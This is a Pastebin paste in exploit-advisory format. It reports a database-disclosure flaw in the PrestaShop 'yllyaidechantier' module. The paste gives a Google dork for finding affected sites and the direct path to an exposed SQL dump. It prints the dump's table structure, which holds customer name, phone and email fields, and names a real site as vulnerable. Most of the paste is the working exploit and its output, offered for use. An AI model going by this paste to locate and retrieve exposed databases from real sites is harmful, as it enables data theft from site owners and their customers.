API tools faq
paste
KingSkrupellos

PrestaShop yllyaidechantier Modules 1.4.9.0 Database Disclos

KingSkrupellos
Dec 23rd, 2018
179
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.19 KB | None | 0 0
raw download clone embed print report
  1. ###########################################################################
  2.  
  3. # Exploit Title : PrestaShop yllyaidechantier Modules 1.4.9.0 Database Disclosure
  4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
  5. # Date : 24/12/2018
  6. # Vendor Homepage : prestashop.com
  7. # Software Download Link : N/A
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Version Information : 1.4.9.0
  11. # Exploit Risk : Medium
  12. # Google Dorks : inurl:''/modules/yllyaidechantier/db/''
  13. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
  14. CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
  15.  
  16. ###########################################################################
  17.  
  18. # Exploit :
  19.  
  20. /modules/yllyaidechantier/db/ydb.sql
  21.  
  22. ###########################################################################
  23.  
  24. # Example SQL Database Dump Information Exposure =>
  25.  
  26. -- phpMyAdmin SQL Dump
  27. -- version 4.0.4
  28. -- http://www.phpmyadmin.net
  29. --
  30. -- Client: localhost
  31. --
  32. Généré le: Lun 07 Avril 2014 à 16:27
  33. -- Version du serveur: 5.5.20-log
  34. -- Version de PHP: 5.3.10
  35.  
  36. SET
  37. SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
  38. SET time_zone = "+00:00";
  39.  
  40.  
  41. /*!40101 SET
  42. @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
  43. /*!40101 SET
  44. @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
  45. /*!40101 SET
  46. @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
  47. /*!40101
  48. SET NAMES utf8 */;
  49.  
  50. --
  51. -- Base de données: `velux`
  52. --
  53. CREATE DATABASE IF NOT EXISTS `velux`
  54. DEFAULT CHARACTER SET latin1 COLLATE latin1_swedish_ci;
  55. USE `velux`;
  56.  
  57. -- --------------------
  58. ------------------------------------
  59.  
  60. --
  61. -- Structure de la table `ps_y_aidechantier_demande`
  62. --
  63.  
  64.  
  65. DROP TABLE IF EXISTS `ps_y_aidechantier_demande`;
  66. CREATE TABLE IF NOT EXISTS
  67. `ps_y_aidechantier_demande` (
  68. `id_demande` int(11) NOT NULL AUTO_INCREMENT,
  69. `id_template
  70. ` int(11) NOT NULL,
  71. `id_customer` int(11) NOT NULL,
  72. `id_scenario` int(11) NOT NULL,
  73. `lastname`
  74. varchar(500) NOT NULL,
  75. `firstname` varchar(500) NOT NULL,
  76. `phone` varchar(50) NOT NULL,
  77.  
  78. `email` varchar(500) NOT NULL,
  79. `fax` varchar(50) NOT NULL,
  80. `chantier_charpente` varchar(500)
  81. NOT NULL,
  82. `chantier_couverture` varchar(500) NOT NULL,
  83. `chantier_fenetre` varchar(500) NOT NULL,
  84.  
  85. `chantier_raccord` varchar(500) NOT NULL,
  86. `chantier_isolation` varchar(500) NOT NULL,
  87.  
  88. `chantier_domotique` varchar(500) NOT NULL,
  89. `date_add` date NOT NULL,
  90. PRIMARY KEY
  91. (`id_demande`)
  92. ) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;
  93.  
  94. -- ----------------
  95. ----------------------------------------
  96.  
  97. --
  98. -- Structure de la table `ps_y_aidechantier_scenario`
  99. --
  100.  
  101. DROP TABLE IF
  102. EXISTS `ps_y_aidechantier_scenario`;
  103. CREATE TABLE IF NOT EXISTS `ps_y_aidechantier_scenario`
  104. (
  105. `id_scenario` int(11) NOT NULL AUTO_INCREMENT,
  106. `id_template` int(11) NOT NULL,
  107.  
  108. `title` varchar(500) NOT NULL,
  109. `price` double NOT NULL,
  110. `date_add` date NOT NULL,
  111.  
  112. PRIMARY KEY (`id_scenario`)
  113. ) ENGINE=InnoDB DEFAULT CHARSET=latin1
  114. AUTO_INCREMENT=3 ;
  115.  
  116. -- --------------------------------------------------------
  117.  
  118. --
  119. -- Structure de la table
  120. `ps_y_aidechantier_template`
  121. --
  122.  
  123. DROP TABLE IF EXISTS `ps_y_aidechantier_template`;
  124. CREATE
  125. TABLE IF NOT EXISTS `ps_y_aidechantier_template` (
  126. `id_template` int(11)
  127. NOT NULL AUTO_INCREMENT,
  128. `id_product` int(11) NOT NULL,
  129. `name` varchar(500) NOT NULL,
  130.  
  131. `date_add` date NOT NULL,
  132. PRIMARY KEY (`id_template`),
  133. UNIQUE KEY `id_product_2` (`id_product`),
  134.  
  135. KEY `id_product` (`id_product`)
  136. ) ENGINE=InnoDB DEFAULT CHARSET=latin1
  137. AUTO_INCREMENT=8 ;
  138.  
  139. /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT
  140. */;
  141. /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
  142. /*!40101
  143. SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
  144.  
  145.  
  146. ###########################################################################
  147.  
  148. # Example Vulnerable Site =>
  149.  
  150. [+] portailpro.fr/modules/yllyaidechantier/db/ydb.sql
  151.  
  152. ###########################################################################
  153.  
  154. # Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team
  155.  
  156. ###########################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!